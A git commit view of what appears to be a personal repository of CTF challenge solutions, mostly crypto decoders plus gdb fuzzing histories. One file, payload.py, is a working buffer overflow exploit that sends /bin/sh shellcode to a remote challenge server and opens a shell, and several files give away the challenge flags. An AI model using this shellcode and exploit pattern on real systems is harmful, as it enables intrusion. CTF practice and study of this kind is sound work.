Browse Source

first commit

master
Christopher Yu 1 year ago
commit
9601394f3e
93 changed files with 669 additions and 0 deletions
  1. 12
    0
      AsgamaCTF/Crypto/1byte_ROXy/decode.py
  2. 1
    0
      AsgamaCTF/Crypto/Capek/base
  3. 10
    0
      AsgamaCTF/Crypto/Capek/decryptloop.py
  4. BIN
      AsgamaCTF/Reverse/XOR_in_reverse/Xrev
  5. 194
    0
      AsgamaCTF/Reverse/pwd/.gdb_history
  6. 1
    0
      AsgamaCTF/Reverse/pwd/decode.py
  7. BIN
      AsgamaCTF/Reverse/pwd/pwdrev
  8. BIN
      CJ2018/Pwn/Dionysus/dionysus_client
  9. BIN
      CJ2018/Pwn/Dionysus/dionysus_server
  10. BIN
      GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip
  11. 26
    0
      GKSK/Crypto/GKSK_Crypto_Service/decrypt.py
  12. 1
    0
      GKSK/Crypto/GKSK_Crypto_Service/flag.enc
  13. 97
    0
      GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py
  14. 1
    0
      GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt
  15. BIN
      GKSK/Joy/Hack_The_Game_v0.0.1/version001
  16. 4
    0
      GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py
  17. 12
    0
      GKSK/Joy/Hack_The_Game_v0.0.2/test.py
  18. BIN
      GKSK/Joy/Hack_The_Game_v0.0.2/version002
  19. 3
    0
      GKSK/Pwn/World_war/.gdb_history
  20. 15
    0
      GKSK/Pwn/World_war/payload.py
  21. 1
    0
      GKSK/Pwn/World_war/peda-session-world_war.txt
  22. BIN
      GKSK/Pwn/World_war/world_war
  23. BIN
      GKSK/Reverse/Decimal1.0/Decimal_1.0
  24. 35
    0
      IDCC/Crypto/DecryptME/decrypt.py
  25. 1
    0
      IDCC/Crypto/DecryptME/enkripsi
  26. 35
    0
      IDCC/Crypto/DecryptME/test.py
  27. 29
    0
      SlashRoot/Crypto/RSA_Token_Generator/payload.py
  28. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png
  29. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png
  30. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png
  31. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png
  32. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png
  33. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png
  34. BIN
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png
  35. BIN
      TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png
  36. BIN
      TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png
  37. BIN
      TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png
  38. BIN
      TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png
  39. 13
    0
      TAMUCTF/Crypto/Smile/decoder.py
  40. BIN
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png
  41. BIN
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png
  42. BIN
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png
  43. BIN
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png
  44. 99
    0
      TAMUCTF/Misc/Hello_World/decoder.py
  45. BIN
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png
  46. BIN
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png
  47. BIN
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png
  48. BIN
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png
  49. BIN
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png
  50. BIN
      TAMUCTF/Misc/I_heard_you_like_files/art.png
  51. 27
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt
  52. BIN
      TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf
  53. BIN
      TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png
  54. BIN
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip
  55. 3
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml
  56. 3
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels
  57. 2
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml
  58. 2
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml
  59. 1
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt
  60. 3
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels
  61. 2
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml
  62. 2
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml
  63. BIN
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png
  64. 2
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml
  65. 2
    0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml
  66. 10
    0
      TAMUCTF/Reverse/KeyGenMe/.gdb_history
  67. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png
  68. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png
  69. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png
  70. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png
  71. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png
  72. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png
  73. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png
  74. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png
  75. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png
  76. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png
  77. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png
  78. BIN
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png
  79. 20
    0
      TAMUCTF/Reverse/KeyGenMe/bruteforce.py
  80. BIN
      TAMUCTF/Reverse/KeyGenMe/keygenme
  81. BIN
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153550.png
  82. BIN
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153910.png
  83. BIN
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_154148.png
  84. BIN
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_202844.png
  85. BIN
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203307.png
  86. BIN
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203644.png
  87. BIN
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203910.png
  88. BIN
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200611.png
  89. BIN
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200703.png
  90. BIN
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200832.png
  91. BIN
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201534.png
  92. BIN
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201719.png
  93. BIN
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_202358.png

+ 12
- 0
AsgamaCTF/Crypto/1byte_ROXy/decode.py View File

@@ -0,0 +1,12 @@
1
+from pwn import *
2
+
3
+cipher = "e7c1cdc1e3f4e6dbcfcec5ffc2d9d4c5ffd8cfd2d29f9fdd"
4
+
5
+cipher = cipher.decode('hex')
6
+
7
+for i in range(256):
8
+	plain = xor(cipher, i)
9
+	if "GamaCTF{" in plain:
10
+		print plain
11
+		break
12
+

+ 1
- 0
AsgamaCTF/Crypto/Capek/base View File

@@ -0,0 +1 @@
1
+Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFppVkZaeVZtMTRTMk15VGtsalJtaG9UV3N3ZUZadGNFZFRNazE1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpYZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMWRyV25kV01ERkZVbFJHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRmhWTW5SM1ZqSktWVkpZWkZwV1JWcHlWVEJhVDJOc2NFaGpSazVYVWpOb2IxWXhaRFJWTVVsNVZXNU9XR0pIVWxsWmJHaFRWMFpTVjJGRlRsTmlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1WFJVcElWbXBLTkZReFdsaFRhMlJxVW14d1dGbHNhRk5OTVZweFUydDBWMVpyY0ZwWGExcDNZa2RGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZVYkdocFZqSm9lbGRYZUc5aU1rbDRWMjVTVGxkSFVsWlVWbHBYVGxaV2RHUkhkRmROVjFKSldWVmFjMWR0U2tkWGJXaGFUVzVvV0ZreFdrZFdWa3B6VkdzMVYwMVZiekZXYlhCTFRrWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTlc5a2JGcEhWbTA1VWsxWFVsaFdNV2h2V1ZaS1IxTnNaRlZXYkhCNlZHdGFWbVZYVWtoa1JtaFRUVWhDU2xac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGbHFTa1psUm1SWldrVTFWMVpzY0ZWWFYzUnJWVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUkVKWFRWWndlVll5ZUhkWGJGcFhZMGhLVjFaRldreFdNVnBIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaGhVMFphVmxscldrdGpSbHB4VkcwNVYxWnNjRWhYVkU1dllWVXhXRlZ1Y0ZkTlYyaDJWMVphUzFJeFRuVlJiRlpYVFRGS05sWkdVa2RWTVZwMFVtdG9VRlp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrcDFXa1pPVGxacmNEVldSM2hoVkRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHWkZkWGJFcHNWbXR3ZVZkcldtOWhWMFkyVm01b1YxWkZTbkpVYTFwclVqRldjMXBHYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXlSa2hoUlRWWFltdEtNbFp0TVRCVk1VMTRWVmhzVlZkSGVGWlpWRVozWVVaV2NWTnRPVmRTYkVwWlZGWmpOV0pIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFoxWTBaa1RsWXlhREpXYWtKclV6RmtWMVp1U2xCV2JIQndWakJhUzA1c1drZFZhMlJXVFdzeE5GWXlOVk5oTVVwMFZXNUNWMkpIYUVSVWJGcHJWbFpHZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp0ZUhkTk1XeFdWMjVrVTJKSVFrZFVNVlUxWVZaS1dWRllaRmhpUmxwb1ZrUktSMVl4VW5KWGJGSnBWbFp3V1ZaR1l6RmlNV1JIWWtoR1ZHRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQllWVEkxYjFZeFdYcGhTRXBhWVd0YWNsVnFSbGRqTWtaR1QxWmtWMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWZDRNVmt3VmpCV01rcEhZa1JhV2xaWGFFeFdNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZVd1ZrdE5iRnB4VW0xR1ZrMVZNVFJXVm1oelZsWmtTR0ZIYUZaTlJuQm9WbTE0YzJOc1pISmtSM0JUWWtad05GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV2FrNVRWRVpzVlZGWWFGTldhM0I2VmtkNFlWVXlTa1pYV0hCWFZsWndSMVF4V2tOVmJFSlZUVVF3UFE9PQ==

+ 10
- 0
AsgamaCTF/Crypto/Capek/decryptloop.py View File

@@ -0,0 +1,10 @@
1
+from base64 import *
2
+with open("base", "r") as file:
3
+    text = file.read()
4
+    decoded = ""
5
+    while True:
6
+        decoded = b64decode(text)
7
+        text = decoded
8
+        if(text.find("CTF{") != -1):
9
+           break
10
+    print text

BIN
AsgamaCTF/Reverse/XOR_in_reverse/Xrev View File


+ 194
- 0
AsgamaCTF/Reverse/pwd/.gdb_history View File

@@ -0,0 +1,194 @@
1
+b *main
2
+r
3
+ni
4
+r
5
+ni
6
+si
7
+ni
8
+si
9
+ni
10
+pdisas c
11
+b *0x0000000000400761
12
+r
13
+ni
14
+si
15
+ni
16
+r
17
+ni
18
+si
19
+ni
20
+ni
21
+r
22
+r
23
+r < $(python -c "print '\xde\x00\x00\x00'")
24
+r <<< $(python -c "print '\xde\x00\x00\x00'")
25
+ni
26
+r <<< $(python -c "print '\xde\x00\x00\x00'")
27
+ni
28
+r <<< $(python -c "print '\xbe\x00\x00\x00'")
29
+ni
30
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
31
+ni
32
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
33
+ni
34
+si
35
+ni
36
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
37
+ni
38
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
39
+ni
40
+si
41
+ni
42
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x00\x02'")
43
+ni
44
+si
45
+ni
46
+r <<< $(python -c "print '\x20\x00\xef\xee\xbe\xad\xde'")
47
+ni
48
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
49
+ni
50
+r <<< $(python -c "print '\x02\x00\xef\xee\xbe\xad\xde'")
51
+ni
52
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
53
+ni
54
+si
55
+ni
56
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
57
+ni
58
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\'")
59
+ni
60
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
61
+ni
62
+si
63
+ni
64
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xef\xee\xbe\x1d'")
65
+ni
66
+r <<< $(python -c "print '\xef\xee\xbe\xad\x1d'")
67
+ni
68
+pdisas c
69
+b *0x0000000000400746
70
+r <<< $(python -c "print '\xef\xee\xbe\xad\x22'")
71
+ni
72
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
73
+ni
74
+si
75
+ni
76
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x11\x11\x11\x11\x1d'")
77
+ni
78
+r <<< $(python -c "print '\x11\x11\x11\x11\x1d\xef\xee\xbe\xad\xde'")
79
+ni
80
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 4 + '\x1d'")
81
+ni
82
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
83
+ni
84
+si
85
+ni
86
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a * 8")
87
+ni
88
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a")
89
+ni
90
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
91
+ni
92
+r <<< $(python -c "print 'a' + '\xef\xee\xbe\xad\xde'")
93
+ni
94
+r <<< $(python -c "print 'a' * 8 + '\xef\xee\xbe\xad\xde'")
95
+ni
96
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
97
+ni
98
+si
99
+ni
100
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d\x1d'")
101
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xde\x1d\x1d\x1d'")
102
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d'")
103
+ni
104
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00x1d'")
105
+ni
106
+si
107
+ni
108
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
109
+ni
110
+si
111
+ni
112
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
113
+ni
114
+si
115
+ni
116
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 6 + '\x1d'")
117
+ni
118
+si
119
+ni
120
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
121
+ni
122
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
123
+ni
124
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
125
+ni
126
+si
127
+ni
128
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + 'a' * 7")
129
+ni
130
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
131
+ni
132
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\x00' * 6")
133
+ni
134
+si
135
+ni
136
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\xd0' * 6")
137
+ni
138
+si
139
+ni
140
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
141
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 3 + '\x00' * 4 + '\x1d'")
142
+ni
143
+si
144
+ni
145
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
146
+ni
147
+si
148
+ni
149
+ni
150
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
151
+ni
152
+si
153
+ni
154
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
155
+ni
156
+si
157
+ni
158
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
159
+ni
160
+si
161
+ni
162
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'* 7")
163
+ni
164
+si
165
+ni
166
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 20")
167
+ni
168
+si
169
+ni
170
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 40")
171
+ni
172
+si
173
+ni
174
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00'*7 + '\x1e'")
175
+ni
176
+si
177
+ni
178
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 7")
179
+ni
180
+si
181
+ni
182
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
183
+ni
184
+si
185
+ni
186
+r <<< $(python -c "print '\x00' + '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
187
+ni
188
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")
189
+ni
190
+si
191
+ni
192
+r <<< $(python -c "print '\xde' + '\x00' + '\x1e' * 13")
193
+ni
194
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")

+ 1
- 0
AsgamaCTF/Reverse/pwd/decode.py View File

@@ -0,0 +1 @@
1
+

BIN
AsgamaCTF/Reverse/pwd/pwdrev View File


BIN
CJ2018/Pwn/Dionysus/dionysus_client View File


BIN
CJ2018/Pwn/Dionysus/dionysus_server View File


BIN
GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip View File


+ 26
- 0
GKSK/Crypto/GKSK_Crypto_Service/decrypt.py View File

@@ -0,0 +1,26 @@
1
+import base64
2
+
3
+secret_out = ''
4
+secret_str = ''.join("gksk-secret-code".split("-"))
5
+for count, loop in enumerate(secret_str):
6
+	if count % 2 == 0:
7
+		secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
8
+	else:
9
+		secret_out += loop
10
+
11
+print secret_out
12
+
13
+enc = open("flag.enc", "r").read()
14
+shift_key = 0
15
+while True:
16
+	shift_key += 1
17
+	cipher = base64.b64decode(enc)
18
+	alphabet = secret_out * 50
19
+	shifted_alphabet = alphabet[shift_key:] + alphabet[:shift_key]
20
+	flag = ''
21
+	for i in range(len(cipher[:-1])):
22
+		flag += chr((ord(cipher[i]) ^ shift_key) - ord(shifted_alphabet[i]))
23
+
24
+	if "GKSK{" in flag:
25
+		print flag
26
+		break

+ 1
- 0
GKSK/Crypto/GKSK_Crypto_Service/flag.enc View File

@@ -0,0 +1 @@
1
+kraiqvy1qe+2oqi2kbSftqS3/KmknKHv7+/rwbj/pK+h8+XS8p+topm17b72sK2b8q6go/ygmaijtfaxoZipm67vv6un8Zu2r7ag4fLHqZGz9Jzxkbet/qG2t5Gpk/ywmLWg/8/LwcyftKmuqbycqZC1rKqzsLWdtqys79ujqqGprLDjoaacor2qqqqgvJHuo7Co0OebveWToojt9s6otrWQqe+psq6h7baa/qG2t5Gpk//+BQ==

+ 97
- 0
GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py View File

@@ -0,0 +1,97 @@
1
+#!/usr/bin/python2.7
2
+# -*- coding: utf-8 -*-
3
+
4
+import sys
5
+import random
6
+import base64
7
+
8
+def banner():
9
+    return '''
10
+
11
+ Welcome to our brand new crypto service
12
+   ________ _______ __ __    ____________  ______  __________     _____ __________ _    __________________
13
+  / ____/ //_/ ___// //_/   / ____/ __ \ \/ / __ \/_  __/ __ \   / ___// ____/ __ \ |  / /  _/ ____/ ____/
14
+ / / __/ ,<  \__ \/ ,<     / /   / /_/ /\  / /_/ / / / / / / /   \__ \/ __/ / /_/ / | / // // /   / __/
15
+/ /_/ / /| |___/ / /| |   / /___/ _, _/ / / ____/ / / / /_/ /   ___/ / /___/ _, _/| |/ // // /___/ /___
16
+\____/_/ |_/____/_/ |_|   \____/_/ |_| /_/_/     /_/  \____/   /____/_____/_/ |_| |___/___/\____/_____/
17
+ version [v2.1.19]
18
+    '''
19
+
20
+def print_usage(script_argv):
21
+    print '[==USAGE==]\n'
22
+    print 'Encrypt File \t: %s -e [plaintext_file] [key]' % script_argv
23
+    print 'Decrypt File \t: %s -d [encrypted_file] [key]' % script_argv
24
+    print 'Generate Key \t: %s -g' % script_argv
25
+    print 'Help \t\t: %s -h\n' % script_argv
26
+
27
+def shift_key():
28
+    key = random.randint(0x1, 0xff)
29
+    return key
30
+
31
+def shuffle_secret():
32
+    secret_out = ''
33
+    secret_str = ''.join('gksk-secret-code'.split('-'))
34
+    for count,loop in enumerate(secret_str):
35
+        if count % 2 == 0:
36
+            secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
37
+        else:
38
+            secret_out += loop
39
+    return secret_out
40
+
41
+def encryption(plain, shift):
42
+    try:
43
+        ciphertext = ''
44
+        length_msg = 50
45
+        with open(plain, 'rb') as bin:
46
+            data = bin.read()
47
+
48
+        shift = int(shift)
49
+        alphabet = shuffle_secret() * length_msg
50
+        shifted_alphabet = alphabet[shift:] + alphabet[:shift]
51
+        for a, b in zip(data, shifted_alphabet):
52
+            ciphertext += chr(ord(a) + ord(b) ^ shift)
53
+
54
+        with open(plain + '.enc', 'wb') as bin:
55
+            bin.write(base64.b64encode(ciphertext))
56
+
57
+    except ValueError:
58
+        print "ValueError : Range key [0-255]"
59
+        exit()
60
+
61
+def decryption(enc_file, key):
62
+    with open(enc_file, 'rb') as bin:
63
+        data = bin.read()
64
+
65
+    '''NOT IMPLEMENTED YET'''
66
+
67
+    with open(enc_file + '.trial', 'wb') as bin:
68
+        bin.write(data)
69
+
70
+
71
+def main():
72
+    print banner()
73
+    script_argv = sys.argv[0]
74
+    try:
75
+        mode = sys.argv[1]
76
+        if mode == '-e':
77
+            plaintext_file = sys.argv[2]
78
+            key = sys.argv[3]
79
+            encryption(plaintext_file, key)
80
+            print "\nSECRET KEY : ", shuffle_secret()
81
+            print '\nThankyou for using our service :)\n'
82
+        elif mode == '-d':
83
+            encrypted_file = sys.argv[2]
84
+            key = sys.argv[3]
85
+            decryption(encrypted_file, key)
86
+            print '\nNot implemented yet. Upgrade to premium, only $99999\n'
87
+        elif mode == '-g':
88
+            print 'Key : ', shift_key()
89
+        elif mode == '-h':
90
+            print_usage(script_argv)
91
+        else:
92
+            print_usage(script_argv)
93
+    except IndexError:
94
+        print_usage(script_argv)
95
+
96
+if __name__ == '__main__':
97
+    main()

+ 1
- 0
GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt View File

@@ -0,0 +1 @@
1
+GKSK{4re_Y0u_53ri0usly_checking_f0r_b3t4_t3sT?}

BIN
GKSK/Joy/Hack_The_Game_v0.0.1/version001 View File


+ 4
- 0
GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py View File

@@ -0,0 +1,4 @@
1
+import base64
2
+
3
+cheat = "PlayerLevel=1;PlayerExp=1;PlayerHP=100;PlayerAtk=987654321;PlayerDef=987654321;PlayerName=ar" 
4
+print base64.b64encode(cheat)

+ 12
- 0
GKSK/Joy/Hack_The_Game_v0.0.2/test.py View File

@@ -0,0 +1,12 @@
1
+cheat = "UGxheWVyTGV2ZWw9OTk5OTk5OTk5O1BsYXllckV4cD05OTk5OTk5OTk5O1BsYXllckhQPTk4NzY1NDMyMTtQbGF5ZXJBdGs9OTg3NjU0MzIxO1BsYXllckRlZj05ODc2NTQzMjE7UGxheWVyTmFtZT1Cb2Rv"
2
+alphabet = "abcdefghijklmnopqrstuvwxyz"
3
+newcheat = ""
4
+for i in cheat:
5
+	if i in alphabet.upper():
6
+		newcheat += i.lower()
7
+	elif i in alphabet.lower():
8
+		newcheat += i.upper()
9
+	else:
10
+		newcheat += i
11
+
12
+print newcheat

BIN
GKSK/Joy/Hack_The_Game_v0.0.2/version002 View File


+ 3
- 0
GKSK/Pwn/World_war/.gdb_history View File

@@ -0,0 +1,3 @@
1
+pattern create 500
2
+r
3
+pattern offset 0x65414149

+ 15
- 0
GKSK/Pwn/World_war/payload.py View File

@@ -0,0 +1,15 @@
1
+shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
2
+from pwn import *
3
+
4
+r = remote("180.250.7.183", 51137)
5
+r.recvuntil("coordinate : ")
6
+
7
+buff = r.recvline()
8
+buff = buff[:10]
9
+buff = int(buff, 16)
10
+buff = p32(buff)
11
+
12
+payload = shellcode + "a" * (72-len(shellcode)) + buff
13
+
14
+r.sendline(payload)
15
+r.interactive()

+ 1
- 0
GKSK/Pwn/World_war/peda-session-world_war.txt View File

@@ -0,0 +1 @@
1
+

BIN
GKSK/Pwn/World_war/world_war View File


BIN
GKSK/Reverse/Decimal1.0/Decimal_1.0 View File


+ 35
- 0
IDCC/Crypto/DecryptME/decrypt.py View File

@@ -0,0 +1,35 @@
1
+# Python2 ver.
2
+# If you use Python3 interpreter, the trouble will be in print format
3
+
4
+# [KSL Playground][Crypto][IDCC2018 DecryptME] written by Mr. Goodnight
5
+# Link: https://euectf.stikom-bali.ac.id/challenges#[IDCC]%20DecryptME
6
+# Flag: IDCC{S1mpl3_4nd_stR4ight}
7
+
8
+from base64 import *
9
+
10
+# Encryption algorithm
11
+# ciphertext = plaintext + keys
12
+with open('./enkripsi', mode = 'r') as f:
13
+	ciphertext = f.read()
14
+
15
+# plaintext = ciphertext - keys
16
+# Make my own function to decrypt the ciphertext
17
+def decrypt(ciphertext, keys):
18
+	plaintext = ""
19
+	for num,char in enumerate (ciphertext):
20
+		plaintext += chr((ord(char) - ord(keys[num % len(keys)])) % 127)
21
+			
22
+	return plaintext
23
+
24
+# keys = ciphertext - plaitext
25
+# Find the key by using known string attack 
26
+# Then I found out that the key is raja
27
+known_string = b64encode("IDCC{")
28
+keys = ""
29
+for num,char in enumerate (known_string):
30
+	keys += chr((ord(ciphertext[num]) - ord(char)) % 127)
31
+
32
+# Run the decrypt function the decode it
33
+keys = "raja"
34
+flag = b64decode(decrypt(ciphertext, keys))
35
+print ("Flag: {f}".format(f = flag))

+ 1
- 0
IDCC/Crypto/DecryptME/enkripsi View File

